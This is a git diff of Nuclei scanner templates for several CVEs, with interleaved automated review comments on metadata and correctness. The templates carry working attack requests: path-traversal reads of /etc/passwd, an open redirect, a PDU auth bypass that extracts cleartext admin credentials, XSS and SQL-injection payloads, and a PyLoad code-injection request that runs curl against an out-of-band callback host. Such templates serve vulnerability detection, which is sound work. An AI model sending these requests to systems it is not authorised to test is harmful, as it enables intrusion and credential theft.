+ classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-22 + epss-score: 0.47251 + epss-percentile: 0.97372 + cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: softwarepublico + product: i3geo + shodan-query: http.html:"i3geo" + tags: cve2022,cve,i3geo,lfi,softwarepublico + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/cve-2022-32444.yaml b/nuclei-templates/CVE-2022/cve-2022-32444.yaml index 1460ae469c..c253fd2076 100644 --- a/nuclei-templates/CVE-2022/cve-2022-32444.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-32444.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest patch or update to a version that has fixed this vulnerability. reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 @@ -14,9 +18,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 - tags: cve,cve2022,redirect,u5cms,cms + epss-score: 0.00237 + epss-percentile: 0.61804 + cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yuba + product: u5cms + tags: cve,cve2022,redirect,u5cms,cms,yuba -requests: +http: - method: GET path: - '{{BaseURL}}/loginsave.php?u=http://interact.sh' @@ -25,6 +36,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by cs 05/30/2022 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a00463044022000c92e83439d52928c125a5e3a681d990ad3013d222cf3bc564b4449423fba5f022009cc04dbd965463fcc3710361b4673c6cdb46578f0b0221f5f237c977a44f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-33174.yaml b/nuclei-templates/CVE-2022/cve-2022-33174.yaml index 59e665b041..6bd02c9441 100644 --- a/nuclei-templates/CVE-2022/cve-2022-33174.yaml 
+++ b/nuclei-templates/CVE-2022/cve-2022-33174.yaml @@ -6,20 +6,33 @@ info: severity: high description: | Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system. + remediation: | + Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability. reference: - https://gynvael.coldwind.pl/?lang=en&id=748 - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 + - https://github.com/Henry4E36/CVE-2022-33174 + - https://github.com/k0mi-tg/CVE-POC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 + epss-score: 0.01241 + epss-percentile: 0.85189 + cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: powertekpdus + product: basic_pdu_firmware shodan-query: http.html:"Powertek" - verified: "true" - tags: cve,cve2022,powertek,auth-bypass + tags: cve2022,cve,powertek,auth-bypass,powertekpdus -requests: +http: - raw: - | GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 @@ -28,7 +41,6 @@ requests: matchers-condition: and matchers: - - type: word words: - '<sys.passwd>' 
@@ -40,10 +52,9 @@ requests: extractors: - type: regex - part: body group: 1 regex: - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' - -# Enhanced by mp on 2022/07/15 + part: body +# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34047.yaml b/nuclei-templates/CVE-2022/cve-2022-34047.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-34047.yaml rename to nuclei-templates/CVE-2022/cve-2022-34047.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-34049.yaml b/nuclei-templates/CVE-2022/cve-2022-34049.yaml index 859471a012..c9d91f7d05 100644 --- a/nuclei-templates/CVE-2022/cve-2022-34049.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-34049.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 
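Review bot: The extractor regexes carried through this hunk, `<sys\.passwd>([A-Z0-9a-z]+)` and `<sys\.su\.name>([a-z]+)`, capture only alphanumeric passwords and lowercase-letter usernames, so a credential containing symbols, or a username with digits or uppercase, is confirmed by the `<sys.passwd>` word matcher but silently never extracted; `([^<]+)` for both groups would capture whatever the PDU returns. By design this extractor writes the device's cleartext administrator credentials into scan output, which deserves a comment above `extractors:` such as `# NOTE: extracts cleartext admin credentials — treat scan output as sensitive`. Moving `part: body` below `regex:` is cosmetic only.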
@@ -17,12 +21,18 @@ info: cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 + epss-score: 0.17111 + epss-percentile: 0.95601 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: cve,cve2022,wavlink,router,exposure -requests: +http: - raw: - | GET /cgi-bin/ExportLogs.sh HTTP/1.1 @@ -45,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-35416.yaml rename to nuclei-templates/CVE-2022/cve-2022-35416.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-36883.yaml b/nuclei-templates/CVE-2022/cve-2022-36883.yaml deleted file mode 100644 index 56ea8fccfa..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-36883.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2022-36883 - -info: - name: Git Plugin up to 4.11.3 on Jenkins Build Authorization - author: c-sh0 - severity: high - description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. - reference: - - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 - - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2022-36883 - cwe-id: CWE-862 - metadata: - shodan-query: X-Jenkins - verified: "true" - tags: cve,cve2022,jenkins,plugin,git - -requests: - - method: GET - path: - - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "repository:" - - "SCM API plugin" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-42889.yaml b/nuclei-templates/CVE-2022/cve-2022-42889.yaml index 8bac9d6211..6531b1138f 100644 --- a/nuclei-templates/CVE-2022/cve-2022-42889.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-42889.yaml 
@@ -2,7 +2,7 @@ id: CVE-2022-42889 info: name: Text4Shell - Remote Code Execution - author: mordavid,princechaddha + author: princechaddha severity: critical description: | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. @@ -22,7 +22,7 @@ info: confidence: tenative tags: cve,cve2022,rce,oast,text4shell,dast -http: +requests: - method: GET path: - "{{BaseURL}}" diff --git a/nuclei-templates/CVE-2023/CVE-2023-0099.yaml b/nuclei-templates/CVE-2023/CVE-2023-0099.yaml index 81521a85fe..8528e84fbe 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0099.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0099.yaml 
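Review bot: The second hunk renames `http:` back to `requests:`, the legacy protocol key that every other template in this commit (cve-2022-32444, cve-2022-33174, cve-2022-34049) is migrating away from; this looks like a regression and `http:` should stay. The first hunk also drops `mordavid` from `author` with no stated reason, which loses attribution for the original template. The context line `confidence: tenative` carries a typo (`tentative`) that this pass over the file could have corrected.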
@@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution. remediation: Fixed in version 115 reference: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: getlasso product: simple_urls framework: wordpress - tags: xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,cve,cve2023 + tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(body, "</script><svg/onload=alert(document.domain)>")' - 'contains(body_2, "search_term")' condition: and -# digest: 4a0a0047304502210083ee1d86f8f27dfdf5dc52807f4ee2df0f15c78f62648df8cdfbdeadc21de84b0220078b0d58f0dae4e65b50a99383484373e8ff8a30c3b91962833a19a9ffa33f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0126.yaml b/nuclei-templates/CVE-2023/CVE-2023-0126.yaml index 9f57bc7c22..abfe116aa8 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0126.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0126.yaml 
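Review bot: The added `impact` text claims "potential remote code execution", which the template's own classification does not support: this is CWE-79 reflected XSS scored CVSS 6.1 with C:L/I:L/A:N. Suggest dropping that clause, e.g. `Successful exploitation can lead to session hijacking, defacement, or theft of sensitive information in the context of a high-privilege user who follows a crafted link.` Overstated impact strings in templates tend to be copied verbatim into findings reports, so they should track the CVSS vector.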
@@ -6,19 +6,23 @@ info: severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 - https://github.com/advisories/GHSA-mr28-27qx-phg3 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001 + - https://github.com/Gerxnox/One-Liner-Collections + - https://github.com/thecybertix/One-Liner-Collections classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.03234 - epss-percentile: 0.90184 + epss-score: 0.34658 + epss-percentile: 0.96997 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +30,7 @@ info: vendor: sonicwall product: sma1000_firmware shodan-query: title:"Appliance Management Console Login" - tags: cve,cve2023,sonicwall,lfi,sma1000 + tags: cve2023,cve,sonicwall,lfi,sma1000 http: - method: GET @@ -47,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ecbf82626efd939f4dad22403b45e0253ae9e8be55f8167abe6ea7cc6b349a3102200454083089e420239c7391312a4cff9a41331f827fc18f711fb3e724187675fe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
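Review bot: The two references added in the first hunk (`Gerxnox/One-Liner-Collections`, `thecybertix/One-Liner-Collections`) are generic command collections rather than sources specific to this SonicWall SMA1000 traversal, and they add little for someone triaging a hit when the NVD, GHSA and SonicWall PSIRT links are already present. The hunk's trailing context still shows `verified: "true"` quoted as a string, while templates edited in this same commit (CVE-2023-0099, CVE-2023-0236) use the bare boolean `verified: true`; normalizing it here while the metadata block is being touched would keep the schema consistent.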
diff --git a/nuclei-templates/CVE-2023/CVE-2023-0236.yaml b/nuclei-templates/CVE-2023/CVE-2023-0236.yaml index 54e6742055..b5fbe5c507 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0236.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0236.yaml @@ -6,17 +6,20 @@ info: severity: medium description: | WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.0.10. reference: - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8 - https://nvd.nist.gov/vuln/detail/CVE-2023-0236 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0236 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00119 + epss-percentile: 0.45193 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +27,7 @@ info: vendor: themeum product: tutor_lms framework: wordpress - tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated + tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum http: - raw: 
@@ -45,4 +48,4 @@ http: - 'contains(body_2, "<svg onload=prompt(document.domain)>")' - 'contains(body_2, "Instructor Registration")' condition: and -# digest: 4b0a00483046022100bf438bfc55a8db446f9d2ff1a59127b415457b68c45b2250f80d1fc556dcc5f3022100bc1243cc552dfa281aa8aea892a02858438a625d4f99d7660d5d5d2e72f181db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0261.yaml b/nuclei-templates/CVE-2023/CVE-2023-0261.yaml index 7034d2cebf..2dce0985c1 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0261.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0261.yaml 
@@ -6,18 +6,21 @@ info: severity: high description: | WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation. remediation: Fixed in version 10.8. reference: - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0 - https://wordpress.org/plugins/wp-tripadvisor-review-slider/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0261 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 - epss-score: 0.05306 - epss-percentile: 0.9225 + epss-score: 0.0753 + epss-percentile: 0.93501 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress - tags: cve2023,wordpress,wp,wp-tripadvisor-review-slider,auth,cve,sqli,wp-plugin,wpscan + tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps http: - raw: 
@@ -51,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "\"data\":{")' condition: and -# digest: 4a0a00473045022100fd1d74793ee89b8b44febd60f211c145dc9bee0a1a99b62e6ddb151fde624c930220526ead0be5be57fb7dfa9e6843c731e639e373aab489b939b49b6dbcdefeec3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cba63b19032eacb33e98f8c5b149b35ccef086fb44efb66696ab7a8c09d0435022100f4c8796c3c0aeaa9cc5d323fa7fcd5cfabcd35a46c056dd4c8a4b95b71032a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0297.yaml b/nuclei-templates/CVE-2023/CVE-2023-0297.yaml new file mode 100644 index 0000000000..9407993ab9 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-0297.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2023-0297 + +info: + name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) + author: MrHarshvardhan,DhiyaneshDk + severity: critical + description: | + Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system. + remediation: | + Upgrade PyLoad to a version that is not affected by this vulnerability. + reference: + - https://www.exploit-db.com/exploits/51532 + - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1058 + - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html + - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0297 + cwe-id: CWE-94 + epss-score: 0.35807 + epss-percentile: 0.96764 + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: pyload + product: pyload + shodan-query: html:"pyload" + zoomeye-query: app:"pyLoad" + tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast +variables: + cmd: "curl {{interactsh-url}}" + +http: + - raw: + - | + GET /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + - | + POST /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - 'JDownloader' + + - type: word + part: interactsh_protocol + words: + - "dns" +# digest: 4b0a00483046022100e04d22e3c9f98a73a04f2df0ebc25a6f86b2441aab53abde2822f6c4307266d4022100f3582924ba72e0f4076d042a65eb28d5f6ab0a70b9094581c0591d602a8e30f2:922c64590222798bb761d5b6d8e72950 \ No 
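Review bot: The reference list of this new template points to `https://nvd.nist.gov/vuln/detail/CVE-2022-1058`, a different pyLoad CVE, while the template's own `cve-id` is CVE-2023-0297; it should read `https://nvd.nist.gov/vuln/detail/CVE-2023-0297`. Separately, the `jk` payload runs `os.system("curl {{interactsh-url}}")` on the target, which is real command execution on the scanned host rather than a passive probe, so a comment above `variables:` such as `# NOTE: executes a command on the target (OAST callback) — run only with authorization` would help operators who gate on the `rce`/`oast` tags. The `remediation` could also name the fixed version the description already gives, `0.5.0b3.dev31`, instead of "a version that is not affected".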
newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0334.yaml b/nuclei-templates/CVE-2023/CVE-2023-0334.yaml index 0dc727935c..f690848cd6 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0334.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0334.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0334 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.001 + epss-percentile: 0.40094 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: shortpixel_adaptive_images framework: wordpress publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/ - tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images + tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel http: - method: GET @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")' condition: and -# digest: 4a0a0047304502203d5a0d3071cfe901b4f7f839f67e36216f6b01cdcee5974be5c768667205b208022100f915868b4da62fc2aff87532e7a983181e2172657236807d82fd732663c1d2c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0448.yaml b/nuclei-templates/CVE-2023/CVE-2023-0448.yaml index 2d525ebd85..3f52acf9d1 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0448.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0448.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 @@ -15,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29476 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: product: wp_helper_premium framework: wordpress publicwww-query: "/wp-content/plugins/wp-helper-lite" - tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite + tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(body, "><svg onload=alert(document.domain)>")' - 'contains(body, "params\":{\"action")' condition: and -# digest: 4a0a0047304502202f74556c7f13048019f383031b64a07ddffe9d28b9d02f2b5e32c9e18aca7e3602210090d475e05409bddbb95ce5cc645a086a143ac5a019a2bd9adfbdf8cb437e3205:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0514.yaml b/nuclei-templates/CVE-2023/CVE-2023-0514.yaml index 07467a46bc..98d83b6ae2 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0514.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0514.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29531 + epss-percentile: 0.29003 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: membership_database_project product: membership_database framework: wordpress - tags: wpscan,cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss + tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project http: - raw: @@ -51,4 +53,4 @@ http: - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "Member Database")' condition: and -# digest: 4a0a00473045022100d4592e96601856f8b413b9bd697d58083a0f9f4695b0a3055ebc3ba05bdda00c02207f898c24894fd658ae335d1cc4548073aafacc069e199691392d4c29bfd6d6e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2023/CVE-2023-0527.yaml b/nuclei-templates/CVE-2023/CVE-2023-0527.yaml index 4e76746784..526013cd9d 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0527.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0527.yaml 
